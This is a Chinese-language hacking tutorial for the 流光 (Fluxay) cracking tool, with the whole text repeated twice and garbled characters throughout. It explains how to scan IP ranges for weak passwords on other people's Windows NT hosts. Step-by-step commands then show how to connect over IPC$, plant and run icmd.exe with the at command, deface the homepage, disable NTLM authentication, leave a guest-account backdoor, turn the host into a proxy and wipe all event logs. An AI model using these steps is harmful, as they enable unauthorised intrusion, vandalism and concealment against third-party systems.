流光5.0破解密碼教程

　　流光5.0的使用方法

　　1：流光概述

　　流光，這款工具可以讓一個(gè)只會(huì)點(diǎn)擊鼠標(biāo)的人成為專業(yè)的黑客，這樣說(shuō)一點(diǎn)也不夸張。它可以探測(cè)POP3，F(xiàn)TP，HTTP，PROXY，F(xiàn)ROM，SQL，SMTP，IPC，等各種漏洞。并針對(duì)個(gè)中漏洞設(shè)計(jì)不同的破解方案。

　　2：流光使用：

　　步驟1：打開(kāi)高級(jí)掃描向?qū)гO(shè)置掃描參數(shù)

　　“文件”--}“高級(jí)掃描向?qū)?rdquo;

　　--}在“起始”/“結(jié)束”位置填入，你要掃描的IP段。

　　--}在“ 目標(biāo)系統(tǒng)”中選擇你要檢測(cè)的操作系統(tǒng)。

　　--}在“獲取主機(jī)名”、“PING檢查”前面打勾

　　--}在“檢測(cè)項(xiàng)目”中選擇“全選”

　　--}然后單擊“下一步”選擇“標(biāo)準(zhǔn)端口掃描”

　　說(shuō)明：“標(biāo)準(zhǔn)斷口”只對(duì)常見(jiàn)的斷口進(jìn)行掃描。

　　“自定義”可以自己定義進(jìn)行掃描。

　　--}然后單擊“下一步” 設(shè)置好所有檢測(cè)項(xiàng)目后點(diǎn)擊“下一步”

　　--}在選擇主機(jī)界面選擇“本地主機(jī)”使用本地主機(jī)進(jìn)任務(wù)掃描。

　　步驟2：?jiǎn)螕?ldquo;開(kāi)始”掃描過(guò)程中要想停止選擇“取消”不過(guò)要等一段時(shí)間。

　　步驟3：查看掃描報(bào)告。掃描結(jié)束之后給出“HTLM”格式的報(bào)告

　　方法二：

　　一、POP3/FTP/…探測(cè)

　　二、IPC探測(cè)

　　三、SQL探測(cè)

　　四、高級(jí)掃描

　　五、其它 …

　　因?yàn)殚_(kāi)發(fā)時(shí)間的原因，上面的探測(cè)模式略有不同，所以分成了四個(gè)部分，本教程說(shuō)的是第一個(gè)部分的探測(cè)。后面的探測(cè)模式應(yīng)該屬于流光的高級(jí)應(yīng)用了：)

　　流光的IPC探測(cè)：

　　一、目的和任務(wù)：

　　1、用流光的IPC探測(cè)獲得一臺(tái)NT主機(jī)的管理權(quán)限，并將這臺(tái)主機(jī)做成一個(gè)跳板/代理。

　　2、學(xué)習(xí)IPC探測(cè)的相關(guān)知識(shí)。

　　二、探測(cè)流程：

　　1、你得有流光，我這里試驗(yàn)用的是流光2001.FOR Win2000 中文版。FOR Win98的不可以。因?yàn)镮PC連接功能是NT/ 2000提供的功能。而且流光FOR 2K 要求你的操作系統(tǒng)得是NT/2000，否則流光啟動(dòng)會(huì)失敗!

　　什么是IPC：

　　IPC是指"InterProcess Communications",準(zhǔn)確的說(shuō)是ipc$，是默認(rèn)的在系統(tǒng)啟動(dòng)時(shí)的admin共享。

　　IPC$是Windows NT/2K中特有的遠(yuǎn)程網(wǎng)絡(luò)登陸功能，它的特點(diǎn)是在同一時(shí)間內(nèi)，兩個(gè)IP之間只允許建立一個(gè)連接。

　　注意，你試圖通過(guò)IPC$連接會(huì)在EventLog中留下記錄。不管你是否登錄成功。

　　可不可以通過(guò)IPC$暴力破解密碼?當(dāng)然可以 ! 不過(guò)，是不是太笨了點(diǎn) …

　　2、首次啟動(dòng)流光，會(huì)看到注冊(cè)的畫面，具體操作請(qǐng)參考本人第一篇教程。我們?cè)谥黜?yè)面上可以有幾種方法來(lái)通過(guò)IPC 探測(cè)獲得管理的權(quán)限。這里我們要作的是得到一臺(tái)跳板，那么就可以用命中率高的辦法來(lái)探測(cè)了(測(cè)試一堆IP來(lái)得到弱口令)。

　　在主界面選擇 探測(cè)→探測(cè)POP3/FTP/NT/SQL主機(jī)選項(xiàng)，或者直接按Ctrl+R。

　　3、出先了上面的小窗口，輸入我們要破解的IP段，我們輸入了來(lái)看看。圖main2我們把“將FrontPage主機(jī)自動(dòng)加入HTTP主機(jī)列表取消了”。因?yàn)槲覀冎幌氆@得IPC弱口令，這樣可以加快掃描的速度 ：)填入IP，選擇掃描NT/98主機(jī)

　　4、探測(cè)中……

　　(注意如果你要探測(cè)的是流光保留的國(guó)內(nèi)的IP段，會(huì)被禁止的，也就是探測(cè)的時(shí)候信息欄出現(xiàn)"IP保留"的字樣)

　　有遠(yuǎn)程主機(jī)的管理密碼了，我們剩下的就是想辦法控制它了，有什么好辦么? ：)有的是 !自己看看工具-菜單下的IIS遠(yuǎn)程命令:)是不是很簡(jiǎn)單呢，我以后在說(shuō)，今天還是先練習(xí)net 命令吧。

　　黑了他 !

　　開(kāi)個(gè)dos prompt 執(zhí)行如下命令，本次用的例子如下圖。

　　1、 net use \對(duì)方ip\ipc$ "密碼" /user:"用戶名" || 建立遠(yuǎn)程連接

　　2、 copy icmd.exe \對(duì)方ip\admin$ || admin$是對(duì)方的winnt目錄 ：) 這里文件多。

　　3、 net time \對(duì)方IP || 看看對(duì)方的本地時(shí)間

　　4、at \對(duì)方ip 啟動(dòng)程序的時(shí)間 啟動(dòng)程序名 啟動(dòng)程序的參數(shù) || 用at命令來(lái)定時(shí)啟動(dòng)程序，在這里我們用soon這個(gè)程序來(lái)做也可以，它可以取代 3/4兩步。

　　5、 telnet 對(duì)方ip 端口 ||

　　6、輸入pass (如果不是用icmd.exe，或者沒(méi)有設(shè)置口令就不用了) ||

　　7、在開(kāi)個(gè)窗口，繼續(xù)copy 我們用的東西。 copy sock.exe copy ntlm.exe copy cl.exe clear.exe

　　如果我們真的想黑了他，只需要把我們的首頁(yè)文件覆蓋目標(biāo)的首頁(yè)就ok了，我們可以通過(guò)dir /s default.htm或者dir /s index.htm 來(lái)確定對(duì)方首頁(yè)的為止，一般是在X:\interpub\wwwroot\ .

　　假如首頁(yè)文件是default.htm并且在c:\interpub\wwwroot，這樣:copy default.htm \ip\c$\interpub\wwwroot

　　下面的圖有演示

　　8、其實(shí)黑人家是很低級(jí)并且沒(méi)意思的：(，我們最好是物有所有，作成跳板吧，今后干活方便點(diǎn)：

　　執(zhí)行我們copy 過(guò)去的ntlm.exe ，取消驗(yàn)正。在給自己留個(gè)后門，比如提升guest的權(quán)限，或者其它的后門工具，這類東西多了自己選吧，看看殺手copy的那堆東西 ：)

　　9、還能做成其他的么 ?

　　當(dāng)然了，只要你有時(shí)間，并且愿意做，我曾經(jīng)偷偷的把自己的主頁(yè)放到人家的server上，速度快、空間無(wú)限，嘿嘿 ：)

　　10、日志清除，斷開(kāi)連接 ：

　　執(zhí)行我們copy 過(guò)去的cl.exe clear.exe 都可以清除日志，比如clear all ：清除所有的日志。然后在斷開(kāi)連接：net use \ip\ipc$ /delete

　　流光簡(jiǎn)介

　　流光4.7)一個(gè)絕好的ftp、pop3解密工具，界面豪華，功能強(qiáng)大!功能簡(jiǎn)介如下：1、用于檢測(cè)POP3/FTP主機(jī)中用戶密碼安全漏洞。2、163/169雙通。3、多線程檢測(cè)，消除系統(tǒng)中密碼漏洞。4、高效的用戶流模式。5、高效服務(wù)器流模式，可同時(shí)對(duì)多臺(tái)POP3/FTP主機(jī)進(jìn)行檢測(cè)。6、最多500個(gè)線程探測(cè)。7、線程超時(shí)設(shè)置，阻塞線程具有自殺功能，不會(huì)影響其他線程。8、支持10個(gè)字典同時(shí)檢測(cè)。9、檢測(cè)設(shè)置可作為項(xiàng)目保存。10、取消了國(guó)內(nèi)IP限制而且免費(fèi)。

　　流光4.7新增功能：

　　1、加入了本地模式，在本機(jī)運(yùn)行是不必安裝Sensor。

　　2、Sensor掃描臨時(shí)結(jié)果文件(*.PTR)的尺寸大約減少了10倍。

　　3、后臺(tái)掃描模式時(shí)，掃描的結(jié)果(*.PTR)可以直接通過(guò)附件發(fā)送到信箱。

　　4、Sensor的掃描速度加快。

　　5、減少了Sensor異常退出的BUG。

　　6、流光的界面和Sensor之間的通訊采用Triple-DES，密鑰的長(zhǎng)度最多可到192bits，保證整個(gè)傳輸過(guò)程不可監(jiān)聽(tīng)。掃描的結(jié)果也只有在密鑰正確的情況下才可閱讀。

　　7、修正的控制服務(wù)，新的控制服務(wù)在升級(jí)Sensor時(shí)不再會(huì)失敗。

　　8、Sensor的服務(wù)名稱可以任意指定，控制服務(wù)和Sensor的進(jìn)程名稱也可以任意指定。

　　9、支持XP(本地模式)，很快會(huì)有98/ME的版本。

　　流光5.0的使用方法

　　1：流光概述

　　流光，這款工具可以讓一個(gè)只會(huì)點(diǎn)擊鼠標(biāo)的人成為專業(yè)的黑客，這樣說(shuō)一點(diǎn)也不夸張。它可以探測(cè)POP3，F(xiàn)TP，HTTP，PROXY，F(xiàn)ROM，SQL，SMTP，IPC，等各種漏洞。并針對(duì)個(gè)中漏洞設(shè)計(jì)不同的破解方案。

　　2：流光使用：

　　步驟1：打開(kāi)高級(jí)掃描向?qū)гO(shè)置掃描參數(shù)

　　“文件”--}“高級(jí)掃描向?qū)?rdquo;

　　--}在“起始”/“結(jié)束”位置填入，你要掃描的IP段。

　　--}在“ 目標(biāo)系統(tǒng)”中選擇你要檢測(cè)的操作系統(tǒng)。

　　--}在“獲取主機(jī)名”、“PING檢查”前面打勾

　　--}在“檢測(cè)項(xiàng)目”中選擇“全選”

　　--}然后單擊“下一步”選擇“標(biāo)準(zhǔn)端口掃描”

　　說(shuō)明：“標(biāo)準(zhǔn)斷口”只對(duì)常見(jiàn)的斷口進(jìn)行掃描。

　　“自定義”可以自己定義進(jìn)行掃描。

　　--}然后單擊“下一步” 設(shè)置好所有檢測(cè)項(xiàng)目后點(diǎn)擊“下一步”

　　--}在選擇主機(jī)界面選擇“本地主機(jī)”使用本地主機(jī)進(jìn)任務(wù)掃描。

　　步驟2：?jiǎn)螕?ldquo;開(kāi)始”掃描過(guò)程中要想停止選擇“取消”不過(guò)要等一段時(shí)間。

　　步驟3：查看掃描報(bào)告。掃描結(jié)束之后給出“HTLM”格式的報(bào)告

　　方法二：

　　一、POP3/FTP/…探測(cè)

　　二、IPC探測(cè)

　　三、SQL探測(cè)

　　四、高級(jí)掃描

　　五、其它 …

　　因?yàn)殚_(kāi)發(fā)時(shí)間的原因，上面的探測(cè)模式略有不同，所以分成了四個(gè)部分，本教程說(shuō)的是第一個(gè)部分的探測(cè)。后面的探測(cè)模式應(yīng)該屬于流光的高級(jí)應(yīng)用了：)

　　流光的IPC探測(cè)：

　　一、目的和任務(wù)：

　　1、用流光的IPC探測(cè)獲得一臺(tái)NT主機(jī)的管理權(quán)限，并將這臺(tái)主機(jī)做成一個(gè)跳板/代理。

　　2、學(xué)習(xí)IPC探測(cè)的相關(guān)知識(shí)。

　　二、探測(cè)流程：

　　1、你得有流光，我這里試驗(yàn)用的是流光2001.FOR Win2000 中文版。FOR Win98的不可以。因?yàn)镮PC連接功能是NT/ 2000提供的功能。而且流光FOR 2K 要求你的操作系統(tǒng)得是NT/2000，否則流光啟動(dòng)會(huì)失敗!

　　什么是IPC：

　　IPC是指"InterProcess Communications",準(zhǔn)確的說(shuō)是ipc$，是默認(rèn)的在系統(tǒng)啟動(dòng)時(shí)的admin共享。

　　IPC$是Windows NT/2K中特有的遠(yuǎn)程網(wǎng)絡(luò)登陸功能，它的特點(diǎn)是在同一時(shí)間內(nèi)，兩個(gè)IP之間只允許建立一個(gè)連接。

　　注意，你試圖通過(guò)IPC$連接會(huì)在EventLog中留下記錄。不管你是否登錄成功。

　　可不可以通過(guò)IPC$暴力破解密碼?當(dāng)然可以 ! 不過(guò)，是不是太笨了點(diǎn) …

　　2、首次啟動(dòng)流光，會(huì)看到注冊(cè)的畫面，具體操作請(qǐng)參考本人第一篇教程。我們?cè)谥黜?yè)面上可以有幾種方法來(lái)通過(guò)IPC 探測(cè)獲得管理的權(quán)限。這里我們要作的是得到一臺(tái)跳板，那么就可以用命中率高的辦法來(lái)探測(cè)了(測(cè)試一堆IP來(lái)得到弱口令)。

　　在主界面選擇 探測(cè)→探測(cè)POP3/FTP/NT/SQL主機(jī)選項(xiàng)，或者直接按Ctrl+R。

　　3、出先了上面的小窗口，輸入我們要破解的IP段，我們輸入了來(lái)看看。圖main2我們把“將FrontPage主機(jī)自動(dòng)加入HTTP主機(jī)列表取消了”。因?yàn)槲覀冎幌氆@得IPC弱口令，這樣可以加快掃描的速度 ：)填入IP，選擇掃描NT/98主機(jī)

　　4、探測(cè)中……

　　(注意如果你要探測(cè)的是流光保留的國(guó)內(nèi)的IP段，會(huì)被禁止的，也就是探測(cè)的時(shí)候信息欄出現(xiàn)"IP保留"的字樣)

　　有遠(yuǎn)程主機(jī)的管理密碼了，我們剩下的就是想辦法控制它了，有什么好辦么? ：)有的是 !自己看看工具-菜單下的IIS遠(yuǎn)程命令:)是不是很簡(jiǎn)單呢，我以后在說(shuō)，今天還是先練習(xí)net 命令吧。

　　黑了他 !

　　開(kāi)個(gè)dos prompt 執(zhí)行如下命令，本次用的例子如下圖。

　　1、 net use \對(duì)方ip\ipc$ "密碼" /user:"用戶名" || 建立遠(yuǎn)程連接

　　2、 copy icmd.exe \對(duì)方ip\admin$ || admin$是對(duì)方的winnt目錄 ：) 這里文件多。

　　3、 net time \對(duì)方IP || 看看對(duì)方的本地時(shí)間

　　4、at \對(duì)方ip 啟動(dòng)程序的時(shí)間 啟動(dòng)程序名 啟動(dòng)程序的參數(shù) || 用at命令來(lái)定時(shí)啟動(dòng)程序，在這里我們用soon這個(gè)程序來(lái)做也可以，它可以取代 3/4兩步。

　　5、 telnet 對(duì)方ip 端口 ||

　　6、輸入pass (如果不是用icmd.exe，或者沒(méi)有設(shè)置口令就不用了) ||

　　7、在開(kāi)個(gè)窗口，繼續(xù)copy 我們用的東西。 copy sock.exe copy ntlm.exe copy cl.exe clear.exe

　　如果我們真的想黑了他，只需要把我們的首頁(yè)文件覆蓋目標(biāo)的首頁(yè)就ok了，我們可以通過(guò)dir /s default.htm或者dir /s index.htm 來(lái)確定對(duì)方首頁(yè)的為止，一般是在X:\interpub\wwwroot\ .

　　假如首頁(yè)文件是default.htm并且在c:\interpub\wwwroot，這樣:copy default.htm \ip\c$\interpub\wwwroot

　　下面的圖有演示

　　8、其實(shí)黑人家是很低級(jí)并且沒(méi)意思的：(，我們最好是物有所有，作成跳板吧，今后干活方便點(diǎn)：

　　執(zhí)行我們copy 過(guò)去的ntlm.exe ，取消驗(yàn)正。在給自己留個(gè)后門，比如提升guest的權(quán)限，或者其它的后門工具，這類東西多了自己選吧，看看殺手copy的那堆東西 ：)

　　9、還能做成其他的么 ?

　　當(dāng)然了，只要你有時(shí)間，并且愿意做，我曾經(jīng)偷偷的把自己的主頁(yè)放到人家的server上，速度快、空間無(wú)限，嘿嘿 ：)

　　10、日志清除，斷開(kāi)連接 ：

　　執(zhí)行我們copy 過(guò)去的cl.exe clear.exe 都可以清除日志，比如clear all ：清除所有的日志。然后在斷開(kāi)連接：net use \ip\ipc$ /delete

　　流光簡(jiǎn)介

　　流光4.7)一個(gè)絕好的ftp、pop3解密工具，界面豪華，功能強(qiáng)大!功能簡(jiǎn)介如下：1、用于檢測(cè)POP3/FTP主機(jī)中用戶密碼安全漏洞。2、163/169雙通。3、多線程檢測(cè)，消除系統(tǒng)中密碼漏洞。4、高效的用戶流模式。5、高效服務(wù)器流模式，可同時(shí)對(duì)多臺(tái)POP3/FTP主機(jī)進(jìn)行檢測(cè)。6、最多500個(gè)線程探測(cè)。7、線程超時(shí)設(shè)置，阻塞線程具有自殺功能，不會(huì)影響其他線程。8、支持10個(gè)字典同時(shí)檢測(cè)。9、檢測(cè)設(shè)置可作為項(xiàng)目保存。10、取消了國(guó)內(nèi)IP限制而且免費(fèi)。

　　流光4.7新增功能：

　　1、加入了本地模式，在本機(jī)運(yùn)行是不必安裝Sensor。

　　2、Sensor掃描臨時(shí)結(jié)果文件(*.PTR)的尺寸大約減少了10倍。

　　3、后臺(tái)掃描模式時(shí)，掃描的結(jié)果(*.PTR)可以直接通過(guò)附件發(fā)送到信箱。

　　4、Sensor的掃描速度加快。

　　5、減少了Sensor異常退出的BUG。

　　6、流光的界面和Sensor之間的通訊采用Triple-DES，密鑰的長(zhǎng)度最多可到192bits，保證整個(gè)傳輸過(guò)程不可監(jiān)聽(tīng)。掃描的結(jié)果也只有在密鑰正確的情況下才可閱讀。

　　7、修正的控制服務(wù)，新的控制服務(wù)在升級(jí)Sensor時(shí)不再會(huì)失敗。

　　8、Sensor的服務(wù)名稱可以任意指定，控制服務(wù)和Sensor的進(jìn)程名稱也可以任意指定。

　　9、支持XP(本地模式)，很快會(huì)有98/ME的版本。